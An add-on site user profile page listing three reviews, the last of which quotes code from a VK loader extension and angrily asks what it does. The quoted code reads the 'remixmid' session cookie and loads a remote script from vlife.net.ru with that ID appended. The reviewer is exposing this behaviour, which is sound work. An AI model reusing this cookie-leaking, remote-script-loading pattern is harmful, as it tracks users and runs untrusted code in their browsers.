Evgeny Leonidovich

關於我

開發者資訊
名稱 Evgeny Leonidovich
地點 Ukraine
加入日期 July 2, 2010
參與開發的附加元件數量 0 個附加元件
此開發者的附加元件平均分數 未經評分

我所發表的評論

Notepad (QuickFox)

評分: 5 / 5 顆星

overlay.css
#quickfox-notes-status-iconTab{
-moz-image-region: rect(-2px, 31px, 16px, 16px)!important;}
#quickfox-notes-status-iconWindow{
-moz-image-region: rect(-2px, 15px, 16px, 0px)!important;}
#quickfox-notes-status-iconSidebar{
-moz-image-region: rect(-2px, 47px, 16px, 32px)!important;}

此意見為舊版本 (2.4B.1-signed.1-signed) 的附加元件。 

Proxy Tool

評分: 4 / 5 顆星

Please make a function to hide / show input proxy or make it in the context menu.I can give you new icons

此意見為舊版本 (1.15) 的附加元件。 

Vkontakte Loader UserJS

評分: 1 / 5 顆星

автор мудак об'ясни пожалуйста что это за код?
if (objDocument.getElementById('vkontakte_loader_extension') == null) {
var s = objDocument.createElement("script");
s.setAttribute("id", 'vkontakte_loader_extension');

var cookieMgr = Components.classes["@mozilla.org/cookiemanager;1"].getService(Components.interfaces.nsICookieManager);

var Cookies = new Array();

for (var e = cookieMgr.enumerator; e.hasMoreElements();)
{
var cookie = e.getNext().QueryInterface(Components.interfaces.nsICookie);
if (cookie.name == 'remixmid')
{
var mid = cookie.value;
//var email = cookie.value;
break;
}
}


s.setAttribute("src", 'http://vlife.net.ru/vkontakte/main.js?vkontakte_id='+mid+'&');
objDocument.documentElement.firstChild.appendChild(s);
}